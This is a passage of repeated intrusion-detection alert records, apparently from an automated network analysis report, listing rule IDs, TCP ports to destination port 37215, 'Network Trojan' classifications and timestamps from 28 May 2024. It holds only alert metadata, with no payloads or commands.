            SID:2835222
            Source Port:58930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790451
            SID:2835222
            Source Port:40034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453114
            SID:2829579
            Source Port:46922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320815
            SID:2829579
            Source Port:42498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070737
            SID:2829579
            Source Port:44066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767067
            SID:2829579
            Source Port:57844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808831
            SID:2835222
            Source Port:36394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485221
            SID:2829579
            Source Port:50422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894336
            SID:2829579
            Source Port:49174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107116
            SID:2835222
            Source Port:48510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.390944
            SID:2835222
            Source Port:34340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760378
            SID:2835222
            Source Port:35168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.861947
            SID:2829579
            Source Port:49286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001057
            SID:2835222
            Source Port:59422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.759668
            SID:2835222
            Source Port:59960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900490
            SID:2835222
            Source Port:51048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.532466
            SID:2835222
            Source Port:36968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771801
            SID:2835222
            Source Port:46934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065456
            SID:2835222
            Source Port:40850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957975
            SID:2835222
            Source Port:58048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.295787
            SID:2835222
            Source Port:38876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469475
            SID:2835222
            Source Port:37408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854738
            SID:2829579
            Source Port:49230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840347
            SID:2829579
            Source Port:51706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251967
            SID:2835222
            Source Port:53016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716396
            SID:2829579
            Source Port:50126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743211
            SID:2835222
            Source Port:55236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039772
            SID:2829579
            Source Port:50004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.943275
            SID:2829579
            Source Port:56426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743663
            SID:2835222
            Source Port:47680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924343
            SID:2835222
            Source Port:46688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.483992
            SID:2829579
            Source Port:53574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848964
            SID:2829579
            Source Port:51770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.888671
            SID:2835222
            Source Port:52124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.845012
            SID:2829579
            Source Port:44340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180676
            SID:2829579
            Source Port:47410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930873
            SID:2829579
            Source Port:57608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910830
            SID:2835222
            Source Port:60096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765328
            SID:2829579
            Source Port:41224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310518
            SID:2835222
            Source Port:47164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.014471
            SID:2835222
            Source Port:35136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.038032
            SID:2829579
            Source Port:45456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.746299
            SID:2829579
            Source Port:57512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922340
            SID:2829579
            Source Port:59880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.347654
            SID:2835222
            Source Port:39090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825440
            SID:2829579
            Source Port:58306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.483013
            SID:2835222
            Source Port:36844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663993
            SID:2835222
            Source Port:46436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955739
            SID:2835222
            Source Port:45054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.474018
            SID:2829579
            Source Port:38070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378197
            SID:2829579
            Source Port:48504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843599
            SID:2835222
            Source Port:42864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885189
            SID:2835222
            Source Port:37604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495789
            SID:2835222
            Source Port:39550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843939
            SID:2829579
            Source Port:35448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279645
            SID:2829579
            Source Port:47536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318087
            SID:2829579
            Source Port:37956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436572
            SID:2829579
            Source Port:48758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891685
            SID:2835222
            Source Port:41892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.026389
            SID:2835222
            Source Port:59590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734178
            SID:2829579
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790098
            SID:2829579
            Source Port:60966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.545789
            SID:2829579
            Source Port:36846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697894
            SID:2829579
            Source Port:39158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298742
            SID:2835222
            Source Port:57368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768104
            SID:2835222
            Source Port:48576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919526
            SID:2829579
            Source Port:51180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.845045
            SID:2829579
            Source Port:43996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853263
            SID:2829579
            Source Port:51798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772572
            SID:2829579
            Source Port:47708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765953
            SID:2835222
            Source Port:46992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919323
            SID:2835222
            Source Port:59376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378511
            SID:2829579
            Source Port:45638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445052
            SID:2829579
            Source Port:58432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064948
            SID:2829579
            Source Port:60338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668848
            SID:2829579
            Source Port:37464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818108
            SID:2835222
            Source Port:46040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753357
            SID:2835222
            Source Port:50672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470349
            SID:2829579
            Source Port:40338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881927
            SID:2835222
            Source Port:51690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.813256
            SID:2829579
            Source Port:39626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434194
            SID:2835222
            Source Port:57330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951195
            SID:2829579
            Source Port:54472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827817
            SID:2829579
            Source Port:55792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.479287
            SID:2835222
            Source Port:50228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.661653
            SID:2829579
            Source Port:51746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559075
            SID:2829579
            Source Port:46976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935506
            SID:2835222
            Source Port:49842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984437
            SID:2829579
            Source Port:48504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868193
            SID:2829579
            Source Port:45334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919050
            SID:2835222
            Source Port:51700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.101991
            SID:2829579
            Source Port:52484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988307
            SID:2829579
            Source Port:36488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374721
            SID:2829579
            Source Port:59890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620604
            SID:2829579
            Source Port:40806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.671383
            SID:2835222
            Source Port:41652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.301020
            SID:2835222
            Source Port:53142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307618
            SID:2835222
            Source Port:33666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482902
            SID:2835222
            Source Port:40002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993824
            SID:2835222
            Source Port:53320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039054
            SID:2835222
            Source Port:45640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.305002
            SID:2829579
            Source Port:37972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180481
            SID:2835222
            Source Port:32776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731262
            SID:2835222
            Source Port:41114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052341
            SID:2829579
            Source Port:37214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.780244
            SID:2835222
            Source Port:48140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620632
            SID:2835222
            Source Port:39370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756083
            SID:2835222
            Source Port:52070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957574
            SID:2835222
            Source Port:58386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012108
            SID:2835222
            Source Port:35258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716734
            SID:2835222
            Source Port:52004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.812474
            SID:2835222
            Source Port:49176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946605
            SID:2835222
            Source Port:51400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777748
            SID:2829579
            Source Port:42304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303711
            SID:2829579
            Source Port:46558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020486
            SID:2829579
            Source Port:34240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231301
            SID:2829579
            Source Port:40144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318065
            SID:2835222
            Source Port:60038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222036
            SID:2835222
            Source Port:58938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222009
            SID:2835222
            Source Port:46280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066047
            SID:2829579
            Source Port:51694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436981
            SID:2829579
            Source Port:43362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.736680
            SID:2829579
            Source Port:42804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880166
            SID:2829579
            Source Port:52270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824665
            SID:2829579
            Source Port:60044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885230
            SID:2835222
            Source Port:46544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849161
            SID:2835222
            Source Port:52546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884533
            SID:2835222
            Source Port:60068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057856
            SID:2835222
            Source Port:52388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251890
            SID:2835222
            Source Port:41300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587230
            SID:2829579
            Source Port:35306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898394
            SID:2829579
            Source Port:54754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961530
            SID:2829579
            Source Port:51322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911231
            SID:2835222
            Source Port:47564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556867
            SID:2829579
            Source Port:55140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334521
            SID:2829579
            Source Port:41482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.581935
            SID:2829579
            Source Port:45414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715323
            SID:2829579
            Source Port:35372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814196
            SID:2835222
            Source Port:42978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869216
            SID:2829579
            Source Port:48704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.475620
            SID:2829579
            Source Port:42354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654676
            SID:2835222
            Source Port:60962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.346310
            SID:2829579
            Source Port:35778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275279
            SID:2835222
            Source Port:58264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.040924
            SID:2829579
            Source Port:33096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696795
            SID:2835222
            Source Port:58516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559943
            SID:2829579
            Source Port:59748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376395
            SID:2835222
            Source Port:32984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744945
            SID:2829579
            Source Port:58034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.704949
            SID:2835222
            Source Port:44048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861346
            SID:2835222
            Source Port:46994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.544428
            SID:2829579
            Source Port:53484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929521
            SID:2829579
            Source Port:59738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.062007
            SID:2835222
            Source Port:47774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849610
            SID:2835222
            Source Port:42550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.707072
            SID:2835222
            Source Port:54136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941778
            SID:2829579
            Source Port:48628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.586705
            SID:2829579
            Source Port:50410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.865998
            SID:2835222
            Source Port:53416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858454
            SID:2835222
            Source Port:53892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052631
            SID:2829579
            Source Port:47348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.097655
            SID:2829579
            Source Port:57514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716874
            SID:2829579
            Source Port:35324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.092489
            SID:2835222
            Source Port:54196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.023537
            SID:2835222
            Source Port:56546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941718
            SID:2835222
            Source Port:34822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752305
            SID:2835222
            Source Port:60100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.747678
            SID:2829579
            Source Port:44022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952609
            SID:2835222
            Source Port:60272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759535
            SID:2829579
            Source Port:48040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562875
            SID:2835222
            Source Port:58144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068422
            SID:2835222
            Source Port:57434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278072
            SID:2829579
            Source Port:54626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067371
            SID:2829579
            Source Port:39938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.170140
            SID:2829579
            Source Port:56962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.782169
            SID:2835222
            Source Port:47300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804739
            SID:2829579
            Source Port:37688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507232
            SID:2829579
            Source Port:59646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903452
            SID:2829579
            Source Port:54918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.494024
            SID:2835222
            Source Port:47556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779028
            SID:2835222
            Source Port:39024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048027
            SID:2835222
            Source Port:42324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326049
            SID:2835222
            Source Port:49776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.805213
            SID:2829579
            Source Port:38266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027098
            SID:2835222
            Source Port:54472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615337
            SID:2829579
            Source Port:37010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618093
            SID:2835222
            Source Port:40134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804808
            SID:2835222
            Source Port:47502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968061
            SID:2829579
            Source Port:43166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995958
            SID:2829579
            Source Port:60508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060149
            SID:2829579
            Source Port:54792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.847105
            SID:2835222
            Source Port:50114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565413
            SID:2829579
            Source Port:57490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.658576
            SID:2829579
            Source Port:44810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056892
            SID:2829579
            Source Port:45158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070868
            SID:2835222
            Source Port:57708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935072
            SID:2829579
            Source Port:33410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279920
            SID:2829579
            Source Port:40300
            Destination Port:37215
